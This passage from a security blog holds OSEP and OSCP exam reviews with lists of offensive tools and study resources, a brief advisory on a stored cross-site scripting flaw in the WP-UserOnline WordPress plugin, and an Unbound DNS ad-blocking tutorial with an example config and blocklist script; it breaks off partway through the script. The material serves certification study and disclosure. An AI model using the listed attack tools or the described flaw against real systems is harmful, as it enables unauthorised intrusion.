<p>Feed: Steffin Stanly, Security Enthusiast (https://steffinstanly.github.io/feed.xml, generated 2023-12-16)</p>
<h1 id="osep-review-2023">OSEP Review 2023</h1>
<p>Steffin Stanly, 2023-06-14. <a href="https://steffinstanly.github.io/OSEP-Review-2023">https://steffinstanly.github.io/OSEP-Review-2023</a></p>
<p>Today, I’m thrilled to delve into one of the most sought-after certifications in the field of penetration testing: Offensive Security’s OSEP (Offensive Security Experienced Penetration Tester) certification. Having already achieved my OSCP (Offensive Security Certified Professional) certification, I decided to take the next step in my career and explore the depths of advanced techniques and evasive maneuvers through the OSEP course.</p>
<p>I will walk you through my journey, providing a comprehensive review of the Evasion Techniques and Breaching Defenses video and PDF course that forms the foundation of the OSEP certification. I will also discuss the learning materials and platforms I used to prepare myself for the challenges that awaited me.</p>
<h2 id="background">Background </h2>
<p>Before starting the course, I had completed the <a href="https://www.hackthebox.com/hacker/pro-labs" target="_blank"><strong>Offshore Labs</strong></a> by HackTheBox, which gave me an understanding of Active Directory and various other tools. Although Offshore is light on the AV evasion side, the OSEP course more than compensates for that.
I would also recommend doing the <a href="https://www.alteredsecurity.com/post/certified-red-team-professional-crtp" target="_blank"><strong>CRTP</strong></a> certification.</p>
<h2 id="course">Course</h2>
<p>Except for a few sections, the course materials and labs were filled with content that was completely new to me, which was daunting initially as I tried to comprehend everything. At one point the 90 days weren’t enough, and I barely completed the last lab.</p>
<p>Places where you can find information and help regarding the course:</p>
<ol>
<li><a href="https://help.offsec.com/hc/en-us/articles/360049781352-OSEP-Exam-FAQ" target="_blank">OffSec FAQs</a></li>
<li><a href="https://www.reddit.com/r/osep/" target="_blank">Reddit - OSEP</a></li>
<li><a href="https://discord.com/invite/offsec" target="_blank">OffSec - Discord</a></li>
<li><a href="https://forums.offensive-security.com/" target="_blank">OffSec - Forum</a></li>
</ol>
<p>You can get the full syllabus for OSEP (PEN-300) <a href="https://www.offsec.com/courses/pen-300/download/syllabus" target="_blank"><strong>here</strong></a>.</p>
<p><a href="/images/osep/syllabus.png"><img src="/images/osep/syllabus.png" /></a></p>
<blockquote>
<p>What are the prerequisites for Evasion Techniques and Breaching Defenses?
All learners are recommended to have either taken Penetration Testing with Kali Linux (PEN-200) and passed the OSCP certification or have equivalent knowledge and skills. These skills include:</p>
<ul>
<li>Working familiarity with Kali Linux and the Linux command line</li>
<li>Solid ability in the enumeration of targets to identify vulnerabilities</li>
<li>Basic scripting abilities in Bash, Python, and PowerShell</li>
<li>Ability to identify and exploit vulnerabilities like SQL injection, file inclusion, and local privilege escalation</li>
<li>Foundational understanding of Active Directory and knowledge of basic AD attacks</li>
<li>Familiarity with C# programming is a plus for this course. </li>
</ul>
</blockquote>
<h2 id="resources--tools">Resources & Tools</h2>
<p>Most of the resources and tools listed here are based on my personal experience during the labs and exams. There are many other resources, but rather than quantity, I have tried to focus on the quality resources that helped me.</p>
<p>I have added my whole set of notes as a cheat sheet for the OSEP course in a GitBook:</p>
<p><a href="https://steffinstanly.gitbook.io/osep-notes/" target="_blank"><strong>Steffin Stanly - OSEP Notes</strong></a></p>
<ol>
<li><a href="https://github.com/chvancooten/OSEP-Code-Snippets" target="_blank">OSEP Code Snippets</a></li>
<li><a href="https://github.com/In3x0rabl3/OSEP" target="_blank">OSEP Notes</a></li>
<li><a href="https://mayfly277.github.io/posts/GOADv2/" target="_blank">Mayfly - Game Of Active Directory v2</a></li>
<li><a href="https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg" target="_blank">MindMap - Pentesting Active Directory</a></li>
<li><a href="https://hideandsec.sh/books/cheatsheets-82c/page/active-directory" target="_blank">CheatSheets - Active Directory</a></li>
<li><a href="https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-active-directory" target="_blank">HackTricks - Linux Active Directory</a></li>
<li><a href="https://book.hacktricks.xyz/windows-hardening/active-directory-methodology" target="_blank">HackTricks - Active Directory Methodology</a></li>
<li><a href="https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/" target="_blank">Windows & Active Directory Exploitation Cheat Sheet</a></li>
</ol>
<h2 id="what-you-should-know-prior">What You Should Know Prior</h2>
<p>Although the course delves into modern techniques and bypasses, it misses out on some basics. Perhaps the learner is expected to have a prior understanding of these already, but since the following tools and techniques are used extensively in the course, it would be better to add them in future updates.</p>
<ul>
<li><a href="https://github.com/byt3bl33d3r/CrackMapExec" target="_blank">CrackMapExec</a>: This greatly helps in identifying reused passwords and credentials, and many more functions are available.</li>
<li><a href="https://github.com/BloodHoundAD/BloodHound" target="_blank">BloodHound</a>: Learn how to collect BloodHound data with SharpHound, analyze it, and discover lateral movement vectors.
<a href="https://www.pentestpartners.com/security-blog/bloodhound-walkthrough-a-tool-for-many-tradecrafts/" target="_blank">PenTest Partners</a> has a great walkthrough.</li>
</ul>
<h2 id="osep-exam">OSEP Exam</h2>
<p>Before the exam, make sure you have checked all the requirements. As usual, all the information can be found on the OffSec website <a href="https://help.offsec.com/hc/en-us/articles/360050293792-OSEP-Exam-Guide" target="_blank">here</a>.</p>
<p>The exam lasts 48 hours, as mentioned on the OffSec website; however, according to one of the <a href="https://help.offsec.com/hc/en-us/articles/360049781352-OSEP-Exam-FAQ" target="_blank">FAQs</a> on the site, the actual duration is 47 hours and 45 minutes. Mine started at 7 AM (May 18th) and ended around 7 AM (May 20th).</p>
<p>There are two ways you can pass the exam: either you achieve the objective provided on the control panel (secret.txt) or you obtain at least 100 points.</p>
<blockquote>
<p><strong>1 Flag = 10 Points</strong>. So 10 Flags = 100 Points. Read the FAQs <a href="https://help.offsec.com/hc/en-us/articles/360049781352-OSEP-Exam-FAQ#h_01FSRPN7N18ZYS8Z5B8X3R6J51" target="_blank">here</a>.</p>
</blockquote>
<p>The most crucial thing is to make sure that you have recorded all relevant evidence, commands, and payloads. I used the Offsec-provided <a href="https://www.offensive-security.com/osep-online/OSEP-Exam-Report.docx" target="_blank">report template</a> for my final report, putting all the steps and supporting documentation into the format given.</p>
<h3 id="1-exam-attempt">#1 Exam Attempt</h3>
<p>My first attempt was in March, and it was disappointing because the exam machine started having issues after a while. I was able to own the first machine, but then I ran into trouble. After being stuck for more than 10 hours at a stretch and trying any number of methods, I gave up hope and asked the support team to check my exam machine. They had already retested it a couple of times, but this time they took longer and informed me that the exam machine did have issues.</p>
<p>They finally called off the attempt and gave me a free attempt in the future.</p>
<h3 id="2-exam-attempt">#2 Exam Attempt</h3>
<p>The second attempt was also not smooth, but the support team helped whenever I faced an issue. A couple of resets fixed places where things that should have worked did not.</p>
<p>Overall there are stability issues, as per my exam experience; I think OffSec should try to correct this in the future, since this is one of the advanced courses. Because the exam network is large, even resets and support take a significant amount of time.</p>
<p>Overall, things were much better compared to the first attempt, and I was able to complete the exam.</p>
<h2 id="wrapping-it-up">Wrapping it Up</h2>
<p>In the end, I stopped the exam with 11 flags and called it a day, since I was tired beyond anything. I started rechecking everything in the report to ensure I had not missed any screenshots or failed to submit any flags.</p>
<p>On May 23, 2023, I received the mail stating that I had passed OSEP. </p>
<p><a href="https://www.credential.net/41c9209b-8654-43ec-a98a-4d6c4bfae66a#gs.0mjm5g" target="_blank"><img src="https://api.accredible.com/v1/frontend/credential_website_embed_image/badge/74108782" alt="OSEP" /></a></p>
<p>Now that OSEP is completed, I want to continue on the red team path and complete <a href="https://training.zeropointsecurity.co.uk/courses/red-team-ops" target="_blank">CRTO</a>. <a href="https://maldevacademy.com/" target="_blank">Maldev Academy</a> is also a possible path. I might enroll in OSWE after these.</p>
<h1 id="cve-2022-2473-wp-useronline">CVE-2022-2473 : WP-UserOnline &lt;= 2.87.6 – Authenticated (Admin+) Stored Cross-Site Scripting</h1>
<p>Steffin Stanly, 2022-07-20. <a href="https://steffinstanly.github.io/CVE-2022-2473-WP-UserOnline">https://steffinstanly.github.io/CVE-2022-2473-WP-UserOnline</a></p>
<p>The WP-UserOnline plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘templates[browsingpage]’ parameter in versions up to, and including, 2.87.6 due to insufficient input sanitization and output escaping.</p>
<p>This makes it possible for authenticated attackers with administrative capabilities and above to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html is disabled.</p>
<p><a href="https://wordpress.org/plugins/wp-useronline/" target="_blank">WP-UserOnline</a></p>
<p>This plugin enables you to display how many users are online on your WordPress site, with detailed statistics of where they are and who they are (Members/Guests/Search Bots).</p>
<p><a href="https://patchstack.com/database/vulnerability/wp-useronline/wordpress-wp-useronline-plugin-2-87-6-authenticated-stored-cross-site-scripting-xss-vulnerability" target="_blank">CVE-2022-2473</a></p>
<h3 id="poc-video">POC Video:</h3>
<iframe width="560" height="315" src="https://www.youtube.com/embed/Q3zInrUnAV0" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen=""></iframe>
<h3 id="vulnerable-code">Vulnerable Code:</h3>
<p><a href="https://github.com/lesterchan/wp-useronline" target="_blank">WP-UserOnline Github</a></p>
<p><a href="/images/CVE-2022-2473-WP-UserOnline/Vuln-code.PNG"><img src="/images/CVE-2022-2473-WP-UserOnline/Vuln-code.PNG" /></a></p>
<h3 id="remediated-code">Remediated Code:</h3>
<p><a href="/images/CVE-2022-2473-WP-UserOnline/fixed-code.PNG"><img src="/images/CVE-2022-2473-WP-UserOnline/fixed-code.PNG" /></a></p>
<ul>
<li><a href="https://github.com/lesterchan/wp-useronline/commit/7f42d65c93f1fac42b3783208921af592cfe8d3f" target="_blank">Github Commit</a></li>
</ul>
<h3 id="references">References:</h3>
<ul>
<li>
<p><a href="https://developer.wordpress.org/reference/functions/esc_url_raw/" target="_blank">esc_url_raw</a></p>
</li>
<li>
<p><a href="https://developer.wordpress.org/reference/functions/wp_kses_post/" target="_blank">wp_kses_post</a></p>
</li>
<li>
<p><a href="https://www.wordfence.com/vulnerability-advisories/#CVE-2022-2473" target="_blank">Wordfence - CVE-2022-2473</a></p>
</li>
</ul>
<h1 id="pwk-and-oscp-review">PWK and OSCP Review</h1>
<p>Steffin Stanly, 2021-07-20. <a href="https://steffinstanly.github.io/PWK-and-OSCP-Review">https://steffinstanly.github.io/PWK-and-OSCP-Review</a></p>
<p>OSCP has been a goal since I started my infosec journey, and the road there lasted a couple of years. Along the way I met some great people who helped me greatly in improving my skills and in my personal growth. Finally, on September 28, 2020, I received the email I had always dreamt about.</p>
<p>It was an ecstatic moment after completing 2 months of gruelling labs; the newly updated course had more exercises, which added to this greatly. OSCP is the toughest exam I have taken to date, and after the 24-hour exam everything finally paid off.</p>
<h2 id="preparation">Preparation</h2>
<p>I would recommend that everyone complete <a href="https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=0" target="_blank"><strong>TJ Null’s OSCP list</strong></a> before enrolling for the course, as many of those machines are quite similar to the OSCP lab machines.</p>
<p>One month before starting the lab time, I had completed most of the machines from TJ Null’s List and focused more on buffer overflow and privilege escalation.</p>
<p>The Udemy courses and TryHackMe rooms go hand in hand; the official materials are a bit light on the privilege escalation side, and these courses help fill that gap.</p>
<ul>
<li><a href="https://www.udemy.com/course/windows-privilege-escalation/" target="_blank">Windows Privilege Escalation for OSCP & Beyond! - Udemy Course</a>
<ul>
<li><a href="https://tryhackme.com/room/windows10privesc" target="_blank">Windows Privilege Escalation - TryHackMe Room</a></li>
</ul>
</li>
<li><a href="https://www.udemy.com/course/linux-privilege-escalation/" target="_blank">Linux Privilege Escalation for OSCP & Beyond! - Udemy Course</a>
<ul>
<li><a href="https://tryhackme.com/room/linuxprivesc" target="_blank">Linux Privilege Escalation - TryHackMe Room</a></li>
</ul>
</li>
<li><a href="https://github.com/justinsteven/dostackbufferoverflowgood" target="_blank">dostackbufferoverflowgood</a>
<ul>
<li><a href="https://tryhackme.com/room/bufferoverflowprep" target="_blank">Buffer Overflow - TryHackMe Room</a></li>
</ul>
</li>
<li><a href="https://www.offensive-security.com/labs/individual/" target="_blank">Proving Grounds</a></li>
</ul>
<p>All of these are extra materials that greatly help speed up lab completion.</p>
<blockquote>
<p>Penetration Testing with Kali Linux is a foundational security course, but still requires students to have certain knowledge before attending the online training class. A solid understanding of TCP/IP, networking, and reasonable Linux skills are required.
Familiarity with Bash scripting along with basic Perl or Python is considered a plus. This advanced penetration testing course is not for the faint of heart;
it requires practice, testing, and the ability to want to learn in a manner that will grow your career in the information security field and overcome any learning plateau.</p>
</blockquote>
<h2 id="resources--tools">Resources & Tools</h2>
<p>Most of the resources and tools listed here are based on my personal experience during the labs and exams. There are many other resources, but rather than quantity, I have tried to focus on the quality resources that helped me.</p>
<ul>
<li>Discord Group
<ul>
<li><a href="https://discord.com/invite/infosecprep" target="_blank">Infosec-prep</a></li>
</ul>
</li>
<li>Enumeration
<ul>
<li><a href="https://github.com/Tib3rius/AutoRecon" target="_blank">Autorecon</a></li>
<li><a href="https://github.com/21y4d/nmapAutomator" target="_blank">nmapAutomator</a></li>
<li><a href="https://sushant747.gitbooks.io/total-oscp-guide/content/list_of_common_ports.html" target="_blank">Common Ports</a></li>
</ul>
</li>
<li>Windows Privilege Escalation
<ul>
<li><a href="https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md" target="_blank">Windows Privilege Escalation - Checklist</a></li>
<li><a href="https://securism.wordpress.com/oscp-notes-privilege-escalation-windows/" target="_blank">Windows Privilege Escalation</a></li>
<li><a href="https://tryhackme.com/room/windows10privesc" target="_blank">Windows Privilege Escalation - TryHackMe Room</a> – This would help in greatly improving Privilege Escalation skills as it goes through all the available methods in much more depth.</li>
<li>Tools:
<ul>
<li><a href="https://github.com/Tib3rius/Windows-PrivEsc-Tools" target="_blank">Complete Set of Windows PrivEsc Tools</a></li>
<li><a href="https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS" target="_blank">WinPEAS</a></li>
<li><a href="https://github.com/GhostPack/Seatbelt" target="_blank">Seatbelt</a></li>
<li><a href="https://github.com/bitsadmin/wesng" target="_blank">wesng</a></li>
<li><a href="https://github.com/ohpe/juicy-potato" target="_blank">Juicy Potato</a></li>
</ul>
</li>
</ul>
</li>
<li>Linux Privilege Escalation
<ul>
<li><a href="https://payatu.com/guide-linux-privilege-escalation" target="_blank">Linux Privilege Escalation</a></li>
<li><a href="https://pentestlab.blog/2017/09/25/suid-executables/" target="_blank">SUID List</a></li>
<li><a href="https://gtfobins.github.io/" target="_blank">GTFOBins</a></li>
<li><a href="https://tryhackme.com/room/linuxprivesc" target="_blank">Linux Privilege Escalation - TryHackMe Room</a> – Highly Recommended for improving Privilege Escalation skills</li>
<li>Tools:
<ul>
<li><a href="https://github.com/Tib3rius/Linux-PrivEsc-Tools" target="_blank">Complete Set of Linux PrivEsc Tools</a></li>
<li><a href="https://github.com/diego-treitos/linux-smart-enumeration" target="_blank">linux-smart-enumeration</a></li>
<li><a href="https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS" target="_blank">linPEAS</a></li>
</ul>
</li>
</ul>
</li>
<li>File Transfer Methods
<ul>
<li><a href="https://isroot.nl/2018/07/09/post-exploitation-file-transfers-on-windows-the-manual-way/" target="_blank">Windows File Transfer</a></li>
<li><a href="https://sushant747.gitbooks.io/total-oscp-guide/content/transfering_files.html" target="_blank">Linux File Transfer</a></li>
</ul>
</li>
<li>Buffer Overflow
<ul>
<li><a href="https://github.com/justinsteven/dostackbufferoverflowgood" target="_blank">dostackbufferoverflowgood</a> – Best resource to start BOF from scratch</li>
<li><a href="https://github.com/Arken2/Everything-OSCP/blob/master/Checklists/WindowsBufferOverflowChecklist.pdf" target="_blank">Buffer Overflow - Checklist</a></li>
<li><a href="https://tryhackme.com/room/bufferoverflowprep" target="_blank">Buffer Overflow - TryHackMe Room</a> – Highly recommended for identifying bad chars and for practice</li>
</ul>
</li>
<li>Exam Report Template
<ul>
<li><a href="https://github.com/whoisflynn/OSCP-Exam-Report-Template" target="_blank">Exam + Lab report</a></li>
</ul>
</li>
<li>Taking Notes
<ul>
<li><a href="https://github.com/giuspen/cherrytree" target="_blank">CherryTree</a></li>
<li><a href="https://github.com/laurent22/joplin" target="_blank">Joplin</a></li>
<li><a href="https://www.microsoft.com/en-us/microsoft-365/onenote/digital-note-taking-app" target="_blank">OneNote</a></li>
</ul>
</li>
<li>Mock Exam
<ul>
<li><a href="https://github.com/six2dez/OSCP-Human-Guide/blob/master/README.md#exam-mockups" target="_blank">OSCP Mock Exam Machines</a></li>
</ul>
</li>
</ul>
<h2 id="oscp-exam">OSCP Exam</h2>
<p>The dreaded 24 hours: after getting cold feet a couple of times when booking the slot, I finally scheduled the exam. I made a backup of my VM in case something went wrong, read through all the rules regarding the exam, and kept a backup power supply and internet connection ready. I wrote down most of the general material in the report beforehand and created skeleton code for the buffer overflow. To pass OSCP a minimum score of 70/100 is required, and each machine is worth a different number of points.
I highly suggest you read the <a href="https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide" target="_blank">OSCP Exam Guide</a> for more details on what is and isn’t allowed during the exam.</p>
<p>To gain an additional 5 points before the exam, you can submit a lab report covering 10 unique OSCP lab machines and a selected number of exercises from the course materials.
This lab report is submitted together with the exam report.</p>
<ul>
<li>
<p>Machine 1 [Buffer Overflow 25 pts] -
I started my exam at 8 AM after completing the proctoring procedures and completed the buffer overflow machine by 9 AM. In parallel I had taken all the screenshots and written rough steps in the report to avoid any confusion later on.</p>
<p>I started enumerating the other 4 machines in the background to save time, so that when I was done with the BOF machine I could start working on the others immediately.</p>
</li>
<li>
<p>Machine 2 [20 pts] -
Enumeration provided the breakthrough and I got a limited shell; after tinkering for 1-2 hours I got the root shell by 1 PM. I took a break after this machine and had lunch.</p>
</li>
<li>
<p>Machine 3 [20 pts] -
A limited shell was attained without much sweat, but the root shell proved to be a headache; my point total stood at 60 with the lab report’s 5 points included. It was 6 PM and I started to get the dreaded feeling that I might not be able to complete it. I kept enumerating further with no luck, switched over to the 25-pointer and 10-pointer machines, and even those proved futile. So I took a much-needed break, came back, and got the root shell by 9:30 PM. The total now stood at 70 and I was happy to have reached the passing score.</p>
</li>
<li>
<p>Machine 4 [10 pts] -
I had to make sure of the passing score, as there was a possibility of the 5 points being rejected if I had made any mistakes in my lab report. So, to get a guaranteed pass, I started to work on the 10-pointer and got the root shell by 11:30 PM. Now I was thrilled about getting 80 points and completing OSCP; all the hard work proved worthwhile at that moment. I took a break, played the <a href="https://www.offensive-security.com/offsec/say-try-harder/" target="_blank">Try Harder</a> song, and enjoyed the moment for a while.</p>
</li>
</ul>
<p>After lying down for a few minutes I almost dozed off from exhaustion, so I decided to complete the exam report and started writing it by 2 AM. I skipped the 25-pointer machine and focused on checking whether all the screenshots were there, as a failure in the exam report would mean failing the exam. I had to retake a couple of screenshots to make sure the report was detailed enough. After 22 hours of exam time, everything was re-checked and the exam report and lab report were sent in the specified format.</p>
<h2 id="wrapping-it-up">Wrapping it Up</h2>
<p>In the end, the lab report was 226 pages long and the exam report was 40 pages long. Most of my time during the lab period was lost in completing the lab report, but in the end I got 75 points even without it. The lab report was too long and was not worth it for the 5 points, but many people were failing at the borderline 65 points, and this pushed me to do the lab report.</p>
<p>I called it a day by 6 AM, after rechecking for any mistakes and sending the reports out. It was a wonderful journey that boosted my confidence in facing any challenges in the future.</p>
<p>On September 28, 2020, about 6-7 days after completing the exam, I received the mail stating that I had passed OSCP.</p>
<p>As of writing, I am vacillating between a couple of certifications, and my next target on the OffSec side would be <a href="https://www.offensive-security.com/awae-oswe/" target="_blank">OSWE</a>.</p>
<h3 id="exam-tips">Exam Tips:</h3>
<ul>
<li>Use Autorecon for enumeration.</li>
<li>Take breaks in between.</li>
<li>Take screenshots and notes in parallel; don’t wait till the end.</li>
<li>Start with BOF and enumerate other machines in the background.</li>
<li>Try the obvious things; without trying you won’t know the result.</li>
<li>Switch machine when there is no progress.</li>
<li>Have proper intake of water and food.</li>
<li>Have a weird idea and doubt it? Try it; who knows, it might work out.</li>
<li>Take proper rest before the exam.</li>
<li>Have proper notes, everything should be a copy-paste away.</li>
<li>Keep notes organized and have a skeleton code for BOF.</li>
<li>Have an outline for the exam report.</li>
</ul>
<h1 id="unbound-dns-blocking">Unbound DNS Blocking</h1>
<p>Steffin Stanly, 2019-02-21. <a href="https://steffinstanly.github.io/Unbound-DNS-Blocking">https://steffinstanly.github.io/Unbound-DNS-Blocking</a></p>
<p>Today we will learn how to set up our own recursive DNS server using Unbound. This improves performance through caching, and we will also look at blocking unwanted domains.</p>
<p>The official Unbound DNS source can be downloaded from the <strong>GitHub</strong> repository “<a href="https://github.com/NLnetLabs/unbound"><strong>NLnetLabs-unbound</strong></a>”.</p>
<p class="notice--warning"><strong>WARNING:</strong> I am by no means an expert in Unbound DNS! I have tried to explain the Unbound DNS setup the best way I could, and I’m sure I might have made a few mistakes here and there. So if a mistake was made or something is misleading, then please let me know in the comments section!</p>
<p>Step 1: Install Unbound</p>
<p>The Unbound package is included in the base repositories of most Linux distributions, so adding separate repositories is usually not necessary.</p>
<p>ON UBUNTU</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>apt-get update <span class="o">&&</span> apt-get <span class="nb">install</span> <span class="nt">-y</span> unbound
</code></pre></div></div>
<p>ON CENTOS</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>yum <span class="nb">install</span> <span class="nt">-y</span> unbound
</code></pre></div></div>
<p>Step 2:</p>
<p>ON UBUNTU</p>
<p>Change /etc/unbound/unbound.conf:</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">include: /etc/unbound/unbound.conf.d/*.conf
</span></code></pre></div></div>
<p>ON CENT OS</p>
<p>Change /etc/unbound/unbound.conf:</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">include: /etc/unbound/conf.d/*.conf
</span></code></pre></div></div>
<p>Next, we will enable unbound</p>
<p><a href="/images/unbound-dns/unbound-1.png"><img src="/images/unbound-dns/unbound-1.png" /></a></p>
<p>After the package has been installed, make a copy of the unbound configuration file before making any changes to the original file.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span><span class="nb">cp</span> /etc/unbound/unbound.conf /etc/unbound/unbound.conf.original
</code></pre></div></div>
<p>Next, use your favourite text editor to open and edit the ‘unbound.conf’ configuration file.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>vi /etc/unbound/unbound.conf
</code></pre></div></div>
<h2 id="enable-ipv4-and-protocol-supports">Enable IPv4 and Protocol Support</h2>
<p>Search for the following options and set them to ‘yes’.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">do-ip4: yes
do-udp: yes
do-tcp: yes
</span></code></pre></div></div>
<h2 id="enable-the-logging">Enable the logging</h2>
<p>To enable logging, add the option below; it will log all Unbound activity to that file.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">logfile: /var/log/unbound
</span></code></pre></div></div>
<h2 id="hide-identity-and-version">Hide Identity and Version</h2>
<p>Enable the following parameter to hide the server identity from id.server and hostname.bind queries.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">hide-identity: yes
</span></code></pre></div></div>
<p>Enable the following parameter to hide the version from version.server and version.bind queries.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">hide-version: yes
</span></code></pre></div></div>
<p>Include the block file path to the unbound.conf file to set up the block list for unbound.</p>
<p><a href="/images/unbound-dns/unbound-2.png"><img src="/images/unbound-dns/unbound-2.png" /></a></p>
<p class="notice--info"><strong>NOTE</strong>: Point the nameserver entry in resolv.conf at the interface IP if you are running Unbound locally on your system.</p>
<p>Add the system or server IP to the interface list.</p>
<p><a href="/images/unbound-dns/unbound-3.png"><img src="/images/unbound-dns/unbound-3.png" /></a></p>
<p>By default the port is 53; if a change is required, just edit the port number.</p>
<p class="notice--info"><strong>NOTE</strong>: Check whether any other process is already using that port with the command <strong>netstat -tunlp</strong>.</p>
<p><a href="/images/unbound-dns/unbound-4.png"><img src="/images/unbound-dns/unbound-4.png" /></a></p>
<p>Next, change the access control to allow queries from our interface’s IP network.</p>
<p><a href="/images/unbound-dns/unbound-5.png"><img src="/images/unbound-dns/unbound-5.png" /></a></p>
<p>Forward zones define where queries are sent on after they reach our local server: once a request has been made to our server and cannot be answered from cache, it is forwarded to the ISP’s DNS server.</p>
<p><a href="/images/unbound-dns/unbound-6.png"><img src="/images/unbound-dns/unbound-6.png" /></a></p>
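<p>Putting the steps above together, here is a complete <code>unbound.conf</code> written as an added example for this post; it is not the author’s own configuration file (the screenshots show the individual options). The listen address 192.168.0.50 and the 192.168.0.0/24 network are assumed values chosen to match the address used in the cache test below, and the upstream resolver address is a placeholder for your ISP’s DNS server.</p>

```text
# /etc/unbound/unbound.conf -- consolidated example (assumed addresses, see above)
server:
    # Listen on the LAN address and loopback. Once any interface: line is
    # present, the default localhost listener is replaced, so list it explicitly.
    interface: 192.168.0.50
    interface: 127.0.0.1
    port: 53

    do-ip4: yes
    do-udp: yes
    do-tcp: yes

    # Setting logfile switches use-syslog off. The unbound user must be able to
    # write here; if chroot is in effect the path is relative to the chroot.
    logfile: "/var/log/unbound"

    # Refuse id.server/hostname.bind and version.server/version.bind queries.
    hide-identity: yes
    hide-version: yes

    # Who may query us: loopback and our LAN only. Unbound refuses everything
    # except localhost by default; never add "0.0.0.0/0 allow", which would turn
    # this into an open resolver usable for amplification.
    access-control: 127.0.0.0/8 allow
    access-control: 192.168.0.0/24 allow

# Anything not answerable from cache goes to the upstream (ISP) resolver.
forward-zone:
    name: "."
    forward-addr: 203.0.113.53    # PLACEHOLDER: your ISP's DNS server

# The blocklist. Because it is pulled in after the forward-zone clause,
# block.conf must itself begin with a "server:" line (see the note below).
include: "/etc/unbound/unbound.conf.d/*.conf"
```

<p>Run <code>unbound-checkconf</code> on the file before restarting the service. The two <code>access-control</code> lines are what let LAN clients query at all, and keeping them to your own network is what keeps the resolver closed to the internet.</p>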
<p>After making the above configuration changes, let’s verify the unbound.conf file for errors with the following command.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>unbound-checkconf /etc/unbound/unbound.conf
</code></pre></div></div>
<p><a href="/images/unbound-dns/unbound-7.png"><img src="/images/unbound-dns/unbound-7.png" /></a></p>
<p>Once the file verifies without errors, you can safely start the 'unbound' service and enable it at system startup.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>systemctl start unbound.service
<span class="gp">#</span><span class="w"> </span>systemctl <span class="nb">enable </span>unbound.service
</code></pre></div></div>
<p><a href="/images/unbound-dns/unbound-8.png"><img src="/images/unbound-dns/unbound-8.png" /></a></p>
<h2 id="blocklist-file">Blocklist File</h2>
<p class="notice--info"><strong>NOTE</strong>: Inside the block.conf always start with <strong>server:</strong> on top of the file</p>
<p>The blocklist can be a static list you maintain yourself, or you can fetch it from one of the repositories that publish curated domain lists. One list I found useful is the "<a href="https://github.com/StevenBlack/hosts"><strong>StevenBlack</strong></a>" GitHub repo, which merges a well-curated block list from several sources.</p>
<p>Every entry in such a hosts-format list has the same layout (a sinkhole IP followed by one or more hostnames), so a small script can fetch the list and rewrite it into Unbound <strong>local-zone:</strong> / <strong>local-data:</strong> directives. To keep the list current, run that script daily as a <strong>cronjob</strong> and reload Unbound afterwards.</p>
<p><a href="/images/unbound-dns/unbound-9.png"><img src="/images/unbound-dns/unbound-9.png" /></a></p>
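<p>As an added example (not code from the original post), the following POSIX shell script performs that conversion: it turns a hosts-format list such as StevenBlack's into an Unbound <strong>server:</strong> block. Instead of making blocked names fail, it redirects each name and its subdomains to <strong>BLOCKPAGE_IP</strong>, assumed here to be the address of the Apache host that serves the block page; 192.168.0.50 is a placeholder borrowed from the drill example below, and the sample input embedded in the script is constructed, not a real list.</p>

```shell
#!/bin/sh
# Added example, not from the original post: convert a hosts-format blocklist
# ("0.0.0.0 ads.example.com", as published by StevenBlack/hosts) into an
# Unbound "server:" block that redirects each blocked name to the block page.
set -eu

# Assumption: the Apache block page lives on this address (override via env).
BLOCKPAGE_IP="${BLOCKPAGE_IP:-192.168.0.50}"

# hosts_to_unbound <hosts-file>
# Prints an Unbound configuration block on stdout. Each blocked name becomes
#   local-zone: "name." redirect        (covers the name and all subdomains)
#   local-data: "name. A <BLOCKPAGE_IP>"
# Use "always_nxdomain" instead of redirect (and drop local-data) if you would
# rather have blocked names simply fail to resolve.
hosts_to_unbound() {
    printf 'server:\n'
    sed -e 's/#.*//' "$1" |
    awk -v ip="$BLOCKPAGE_IP" '
        # Only sinkhole lines count; one hosts line may carry several names.
        ($1 == "0.0.0.0" || $1 == "127.0.0.1") && NF >= 2 {
            for (i = 2; i <= NF; i++) {
                h = tolower($i)
                # StevenBlack lists contain "0.0.0.0 0.0.0.0" and the usual
                # localhost names; blocking those would break the resolver host.
                if (h == "0.0.0.0" || h == "localhost" || h == "localhost.localdomain" ||
                    h == "broadcasthost" || h == "ip6-localhost" || h == "ip6-loopback")
                    continue
                # Refuse anything that is not a plain hostname: a stray quote or
                # space here would corrupt the generated configuration line.
                if (h !~ /^[a-z0-9_][a-z0-9_.-]*$/) continue
                if (h in seen) continue      # lists repeat names across sources
                seen[h] = 1
                printf "    local-zone: \"%s.\" redirect\n", h
                printf "    local-data: \"%s. A %s\"\n", h, ip
            }
        }'
}

# Constructed sample input (not a real list) so the script runs stand-alone.
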